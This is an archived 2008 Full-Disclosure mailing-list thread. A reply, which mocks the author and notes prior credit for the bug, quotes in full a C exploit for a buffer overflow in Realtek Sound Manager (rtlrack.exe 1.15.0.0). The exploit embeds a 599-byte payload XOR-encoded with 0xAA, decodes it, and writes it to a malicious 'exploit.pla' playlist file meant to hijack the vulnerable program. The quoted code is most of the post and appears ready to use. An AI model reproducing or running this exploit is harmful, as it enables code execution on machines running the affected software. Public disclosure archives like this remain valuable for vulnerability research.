| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 19 Dec 2008 07:11:42 -0500
From: "j-f sentier" <j.sentiar@...il.com>
To: bartoszwojcik@...hmail.com, full-disclosure@...ts.grok.org.uk
Subject: Re: Realtek Sound Manager (rtlrack.exe1.15.0.0)
Bufferoverflow exploit
Also you forgot to give the credit to shinnai who originaly found this bug :
http://milw0rm.com/exploits/7492
2008/12/19 j-f sentier <j.sentiar@...il.com>
> "any jobs offers are ALWAYS welcome!"
> Kmart is hiring, you'll may find a job there.
> btw your code is horrible.
>
>
> 2008/12/19 <bartoszwojcik@...hmail.com>
>
>> /*
>>
>> Realtek Sound Manager (rtlrack.exe1.15.0.0) Bufferoverflow exploit
>> copyrights Bartosz Wójcik (Bartosz Wojcik) / bart^xt
>> all rights reserved!
>>
>> any jobs offers are ALWAYS welcome! more on my websites:
>> http://www.goldenline.pl/bartosz-wojcik5
>> http://wojcikbartosz.blogspot.com/
>> http://www.pelock.com
>>
>> P.S great KUDOS for my super friend ReWolf .-~> i hope you are
>> earning nice money in ESSET Cracow!
>> btw. New TAC is comming and ctrl-d will be up soon too!
>>
>> P.S2 OMEGARED (twoja stara pierze w rzece)
>>
>> SILESIA! SILESIA! SILESIA! catch me on ircnet/#crackpl/#crackscene
>>
>> ->>>>>> FLAMEZ TO ARTEAM AND WOODMANNNNNNNNN!!
>>
>> */
>>
>>
>> #include<stdio.h>
>>
>> unsigned char bad_data[599] = {
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB, 0xEB,
>> 0xEB, 0x41, 0x10, 0x95, 0xD4,
>> 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A,
>> 0x3A, 0x41, 0xA9, 0xF3, 0x41,
>> 0xAF, 0x42, 0x52, 0x55, 0x55, 0x55, 0xE5, 0xE3, 0xE3, 0xE3, 0xE3,
>> 0xE3, 0xE3, 0xFB, 0xF0, 0xFC,
>> 0xFE, 0xF2, 0x9C, 0x99, 0x9A, 0xFC, 0xF2, 0x9E, 0xEB, 0x9A, 0xE8,
>> 0x9C, 0xE2, 0xE2, 0x9A, 0xE8,
>> 0x99, 0x9A, 0xE8, 0xE9, 0xFC, 0xF2, 0x98, 0xE8, 0xEE, 0xE8, 0xE2,
>> 0x9E, 0xEB, 0x98, 0xEB, 0xEE,
>> 0x9A, 0xEB, 0xEE, 0xFE, 0xE8, 0xEE, 0xFB, 0xE8, 0x9A, 0xEB, 0xEE,
>> 0xEB, 0xFC, 0xF2, 0x9E, 0xF0,
>> 0x92, 0xE8, 0xEE, 0xE0, 0xE5, 0xE7, 0xE4, 0xE5, 0xE0, 0xE4, 0xEC,
>> 0x9E, 0xE8, 0xFA, 0xE8, 0x9A,
>> 0xE8, 0xFA, 0xE1, 0x92, 0xEF, 0xEE, 0xE4, 0xE9, 0xE1, 0x92, 0xE4,
>> 0xED, 0xEF, 0x9A, 0xE0, 0xED,
>> 0xEB, 0x9A, 0xE5, 0xE4, 0xE1, 0xE2, 0xE5, 0xFE, 0xE0, 0xEB, 0xE1,
>> 0x92, 0xE5, 0xFF, 0xE8, 0xF8,
>> 0xEB, 0x9A, 0xE1, 0xE4, 0xE3, 0xFE, 0xE1, 0xE2, 0xEC, 0x99, 0xE1,
>> 0xE2, 0xEB, 0xFA, 0xFA, 0xE4,
>> 0xEB, 0xE9, 0xE8, 0xE6, 0xE3, 0xF3, 0xE4, 0xE0, 0xEC, 0xE2, 0xE8,
>> 0xE6, 0xEC, 0xED, 0xED, 0xFA,
>> 0xEB, 0xE6, 0xE6, 0xE6, 0xE7, 0xFA, 0xEB, 0xFA, 0xEE, 0xE6, 0xE1,
>> 0xE4, 0xEC, 0xE5, 0xE1, 0xE9,
>> 0xEC, 0x9F, 0xEC, 0xF8, 0xEC, 0x9A, 0xEF, 0x9D, 0xEF, 0xE4, 0xE1,
>> 0xF2, 0xE5, 0xEF, 0xEC, 0xE8,
>> 0xEB, 0xFA, 0xE1, 0xE4, 0xE2, 0xEC, 0xE1, 0xE2, 0xE4, 0x9A, 0xE1,
>> 0xEE, 0xE1, 0xE2, 0xE5, 0x9F,
>> 0xE4, 0xEB, 0xEB, 0x9A, 0xE1, 0xE4, 0xE1, 0x92, 0xE4, 0xFB, 0xE1,
>> 0x92, 0xEB, 0xFA, 0xE1, 0xE4,
>> 0xE3, 0x92, 0xE4, 0xEF, 0xEC, 0x98, 0xEC, 0xFA, 0xE9, 0xE6, 0xEB,
>> 0x99, 0xE8, 0xE6, 0xEC, 0xEC,
>> 0xE1, 0xE2, 0xE8, 0x9E, 0xE8, 0x99, 0xEF, 0x92, 0xE8, 0xE6, 0xE0,
>> 0xED, 0xE4, 0x9A, 0xE1, 0x92,
>> 0xE8, 0x9E, 0xE4, 0xFA, 0xE1, 0xF2, 0xE8, 0xED, 0xE4, 0xEB, 0xE7,
>> 0xE0, 0xE1, 0xF2, 0xE0, 0x9C,
>> 0xE0, 0x9A, 0xE1, 0xE4, 0xE3, 0xFA, 0xE1, 0xE2, 0xE8, 0xE2, 0xE8,
>> 0xE1, 0xE8, 0x9A, 0xE8, 0xFA,
>> 0xE8, 0x9A, 0xE1, 0x92, 0xE0, 0xFC, 0xE4, 0xE9, 0xE5, 0xFF, 0xEB,
>> 0x99, 0xE2, 0xE5, 0xE8, 0xEC,
>> 0xE2, 0x9F, 0xE3, 0x92, 0xE0, 0xE5, 0xE9, 0xF2, 0xE8, 0xE6, 0xE1,
>> 0x9D, 0xE8, 0xFF, 0xE0, 0x9C,
>> 0xE8, 0xE5, 0xE6, 0xF2, 0xEC, 0xFA, 0xE5, 0x9F, 0xE0, 0x9C, 0xE0,
>> 0xF3, 0xFA, 0xE5, 0xE6, 0x92,
>> 0xFA, 0xFA, 0xED, 0xFF, 0xE5, 0xE5, 0xED, 0xE4, 0xE9, 0xFC, 0xEB,
>> 0xFC, 0xE4, 0xEC, 0xE9, 0xFC,
>> 0xFA, 0x98, 0xEF, 0xEC, 0xE0, 0x9D, 0xEF, 0x9C, 0xE8, 0xFA, 0xF0,
>> 0x3A, 0x3A, 0x3A, 0x3A, 0x3A,
>> 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A, 0x3A
>> };
>>
>>
>> int main(void) {
>> int i;
>> FILE *sploit;
>>
>> printf("Realtek Sound Manager (rtlrack.exe1.15.0.0) Bufferoverflow
>> exploit\n");
>> printf("by Bartosz Wojcik (Wójcik) / bart^xt\n");
>> printf("http://wojcikbartosz.blogspot.com/\n<http://wojcikbartosz.blogspot.com/%5Cn>
>> ");
>>
>> sploit=fopen("exploit.pla","wb+");
>> for (i=0;i<sizeof(bad_data); i++) bad_data[i]^=0xAA;
>> fwrite(bad_data,sizeof(bad_data),1,sploit);
>> fclose(sploit);
>> return 0xDEADBABE;
>> }
>>
>> --
>> Sell your gold jewelry and get cash fast! Click now.
>>
>> http://tagline.hushmail.com/fc/PnY6qxvKSSrw1jAHJmueLmVmgP43kLn7Pm0nmhJ1riw4dA2EWQPXq/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists